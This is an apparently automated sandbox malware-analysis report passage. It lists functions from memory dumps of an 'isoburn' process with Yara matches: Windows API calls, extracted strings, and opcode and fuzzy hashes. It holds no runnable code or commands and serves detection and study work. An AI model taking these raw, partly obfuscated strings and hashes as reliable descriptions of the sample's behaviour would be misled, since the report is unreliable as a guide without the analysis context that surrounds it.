                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                              • API String ID: 2422867632-999386047
                                                              • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                              • Instruction ID: d29a28193e34c99e8252070c6d5602dfdd6f10f226c4825c98282d93206b6054
                                                              • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                              • Instruction Fuzzy Hash: C08166B0D45668CBEB20CF85C9587DEBAB1BB45308F1081D9D15C3B281C7BA1A89CF95
                                                              Function 02EDF3F9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                              • Instruction ID: f8b67879278d09cc6b7e96b548cde0f5c55fd80de7aae25c8f0371a9fb8b2df8
                                                              • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                              • Instruction Fuzzy Hash: 414153B5A0060A9FDB00DFD8DC80DEEB7B9FF88304B148559E916EB254D774AE05CBA0
                                                              Function 02EDF400 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                              • Instruction ID: cf54f4c084a42f4c092190b80387faab2d4a345daed3a23e89bf0679a0c71921
                                                              • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                              • Instruction Fuzzy Hash: 8E3114B5A0060A9FDB10DFD8D8809EFB7B9BF88304B108559E916EB214D775EE45CBA0
                                                              Function 02EE3980 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 02EE3A5B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: wininet.dll
                                                              • API String ID: 3472027048-3354682871
                                                              • Opcode ID: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                              • Instruction ID: 1dab9d3d297f0ac58ecdb7d992b47eecc7c48e43ecfa3630a3b2d0544034725d
                                                              • Opcode Fuzzy Hash: 1ff3d2c6287c48c0358b3c1be33f9c72c9022aad4df32ef87cc455a3175c6b48
                                                              • Instruction Fuzzy Hash: D731BDB0640605BBDB14DFA4CC84FFBB7B9BB88304F50955DA50E6B240D770AA40CBA4
                                                              Function 02ED4460 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02ED44D2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                              • Instruction ID: 397649bff4fae3d9bcbc4218097b4856550ba9505eb8050b837a287b0fbc9516
                                                              • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                              • Instruction Fuzzy Hash: E0015EB5D8020DABDF10EBE0EC41F9EB3B99B14708F1091A5E91997280F631EB55CB91
                                                              Function 02EE97B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02ED820E,00000010,?,?,?,00000044,?,00000010,02ED820E,?,?,?), ref: 02EE9813
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                              • Instruction ID: a6148797ee95a5a884e3c6aa6a1ab3fea18e5a6ce5702ebf517ea7b552b2ad4d
                                                              • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                              • Instruction Fuzzy Hash: 4301C0B2200208BBCB14DE8DDC80EDB77AEAF8C710F118208BA09E3241D630F8518BA4
                                                              Function 02EC9DE0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC9E25
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                              • Instruction ID: 088fbe2758b106de9e3099d9e930c8cce21137352ec1014cab71a6a2e7c3a098
                                                              • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                              • Instruction Fuzzy Hash: 6EF0657338071476D62061E9AC02FDBB38DDB94BA5F244019F60DEA2C0DAA1F84146E5
                                                              Function 02EC9DDC Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EC9E25
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                              • Instruction ID: c44d52cba7eaef61bc51c9831f9cd112cbc40946782d21e8efbeff84c0fbacea
                                                              • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                              • Instruction Fuzzy Hash: CFF0ED722C030472E22062E98C02FDB728C8B94BA1F204008F60DAB2C0DAA1F84286F9
                                                              Function 02EE96D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(02ED1969,?,02EE57BB,02ED1969,02EE556F,02EE57BB,?,02ED1969,02EE556F,00001000,?,?,00000000), ref: 02EE970C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                              • Instruction ID: 0e936afacc91878ce7c609ebf6faff6246123fcb5ae2adbd1cce2a1d69d40b01
                                                              • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                              • Instruction Fuzzy Hash: 29E065B2244204BBDB24EE98DC40FAB77ADEFC9750F008019F90DA7282D630B9108BB4
                                                              Function 02EE9720 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,02ED3CE4,000000F4), ref: 02EE975C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                              • Instruction ID: 2f595941cde1ab35076878f9efaa6d8f62c192f5eb773089bb8594d8d237df70
                                                              • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                              • Instruction Fuzzy Hash: 64E06D72240205BBDA14EE58DC85FAB37AEEFC9710F008418F909A7242C670B9118AB4
                                                              Function 02ED8250 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02ED827C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                              • Instruction ID: 60b139ed7a33d6fbe7cc69426efac1456d4a50f81558f5568b5fc38d3ccd3c20
                                                              • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                              • Instruction Fuzzy Hash: F0E04F7528060866EE28AAE89C45FA633689B4877CF5C8660BD1D9F2C5E778E9434190
                                                              Function 02ED8037 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02ED1C50,02EE7EAF,02EE556F,02ED1C1D), ref: 02ED8073
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                              • Instruction ID: 37b1574f5a61be10b1ca56d6a20b2c24b5164e40db7b65387408b7d32d3e80d2
                                                              • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                              • Instruction Fuzzy Hash: 5AE02BB17812007EF710EAF8DC06F99334C6B64758F5080A8F50CEB2C1DB70E0028574
                                                              Function 02ED8040 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02ED1C50,02EE7EAF,02EE556F,02ED1C1D), ref: 02ED8073
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                              • Instruction ID: 8f00939ae4034a0668ea0f9ef94a5c2c46f731be9f74d95b67dc95cd7a51d482
                                                              • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                              • Instruction Fuzzy Hash: 00D05E716803087BF610E6F99C16F9A328D5B047A8F948064B94CEB2C2EA74F44285B5
                                                              Function 02ED0D3B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111), ref: 02ED0D47
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3282607865.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2ec0000_isoburn.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                              • Instruction ID: 10c932ba57e1eef0ccb1c85abff58f07901af93f6fe814212003c3efe318d935
                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                              • Instruction Fuzzy Hash: 9ED0A76774001C36A6014584ACC1DFEB71CDB857A5F004063FF08D1040D621590206B0
                                                              Function 04EE2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1d9863da0c671cd924fc54032a6b5bf4d96362f0de6e76bb25aae44f07e457f0
                                                              • Instruction ID: c132ba972931b0f4d8c0f88e367de2faf8acad04aecbd8b6039d4bb32c4c207a
                                                              • Opcode Fuzzy Hash: 1d9863da0c671cd924fc54032a6b5bf4d96362f0de6e76bb25aae44f07e457f0
                                                              • Instruction Fuzzy Hash: DFB09B719019C5C5FF51FB614A097177914BBD1705F15D0A1D3430641E4738D1D1F175

                                                              Non-executed Functions

                                                              Function 051C04F8 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3285519239.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_51c0000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                              • Instruction ID: ec8062aabca50986e173980581697ee788fbe2847994fd939e8dba3acba48473
                                                              • Opcode Fuzzy Hash: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                              • Instruction Fuzzy Hash: 8D41177161CF0D8FC768EF68908967AB7E2FB59300F50066DC98AC3252EB75E8468785
                                                              Function 051CDF59 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3285519239.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_51c0000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                              • Instruction ID: 309789157761b385d2af2d0057cb54b497f55efe88af6476814d1869b25e7980
                                                              • Opcode Fuzzy Hash: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                              • Instruction Fuzzy Hash: E89160F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                              Function 04EE2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: bf5572a575ad4c0fa83fb6ec6d9f4a747bef72c8ff65a35ae9f733394a0728a6
                                                              • Instruction ID: f2da6d31f6d6c59d353107ed9b6f1cb864f8fb0775533f3f4b1c667f0a6ddae3
                                                              • Opcode Fuzzy Hash: bf5572a575ad4c0fa83fb6ec6d9f4a747bef72c8ff65a35ae9f733394a0728a6
                                                              • Instruction Fuzzy Hash: 7651E7B6E04116BFDB10DF999C9097EF7BCBB08204714A169E659D7641E335FE01CBA0
                                                              Function 04F52410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 4a2bd20569ac8d524360430572f19bb00cbe0f94e6521406c675b56d28a1c855
                                                              • Instruction ID: 0c4513c77f59f5813c91f1cf61f13fea99e65c9763dcf85fdeeda9f0b76f7e26
                                                              • Opcode Fuzzy Hash: 4a2bd20569ac8d524360430572f19bb00cbe0f94e6521406c675b56d28a1c855
                                                              • Instruction Fuzzy Hash: 23510475E00645AFDB34DF5CCC9087FB7F9AF48204B018599EA96D3692E6B4FA018F60
                                                              Function 04ED7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Execute=1, xrefs: 04F14713
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F14787
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F14725
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F14742
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F14655
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F146FC
                                                              • ExecuteOptions, xrefs: 04F146A0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 652107a9d1fd580eab51c336b97e7ef8605dee505d8c0c7e5901ff54b02a3a8e
                                                              • Instruction ID: 5987037636d0e7c5d23331fa597f28a0fa58f508309ca571bc722b41666cd4ab
                                                              • Opcode Fuzzy Hash: 652107a9d1fd580eab51c336b97e7ef8605dee505d8c0c7e5901ff54b02a3a8e
                                                              • Instruction Fuzzy Hash: 325107316002197AEF14ABA5DC85FE977B8EF44708F1418A9E519AB1D0EB71BE438F50
                                                              Function 051C3BD9 Relevance: 12.6, Strings: 10, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3285519239.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_51c0000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                              • API String ID: 0-2612338985
                                                              • Opcode ID: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                              • Instruction ID: 3857f462bf2a78abc45e84848af20bcb92820e95657df3a8edfad3cd1e7920ab
                                                              • Opcode Fuzzy Hash: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                              • Instruction Fuzzy Hash: BC2157B054474DDBCF14DF90D455ADEBBB1FF14349F4150A8E8196E202C7768299CB89
                                                              Function 04EEB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 2c2ad886afee47ec2bb80d663caa2cac3c198e743a6f4256406f59ca3ef6c2a1
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 8981E370E0524ACEEF24CF6AC8517FEBBB2AF45318F18661AD851A7790D730B841CB54
                                                              Function 04ECF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 04F1031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F102E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F102BD
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 8048c1056a4624c87633c5abbeccd70dfb7123eefd0f78f6023c65397adfc581
                                                              • Instruction ID: 610eead1b117af55a0caee8569f6ca16379fe3829e1aac7b7f6fa67f2aa30246
                                                              • Opcode Fuzzy Hash: 8048c1056a4624c87633c5abbeccd70dfb7123eefd0f78f6023c65397adfc581
                                                              • Instruction Fuzzy Hash: 13E1BD316047419FE725CF28C984B6AB7E1FF88318F141A5DF5A58B6E0EB74E846CB42
                                                              Function 04EDBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 04F17BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F17B7F
                                                              • RTL: Resource at %p, xrefs: 04F17B8E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3284547069.0000000004E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E70000, based on PE: true
                                                              • Associated: 00000006.00000002.3284547069.0000000004F99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.0000000004F9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000006.00000002.3284547069.000000000500E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4e70000_isoburn.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
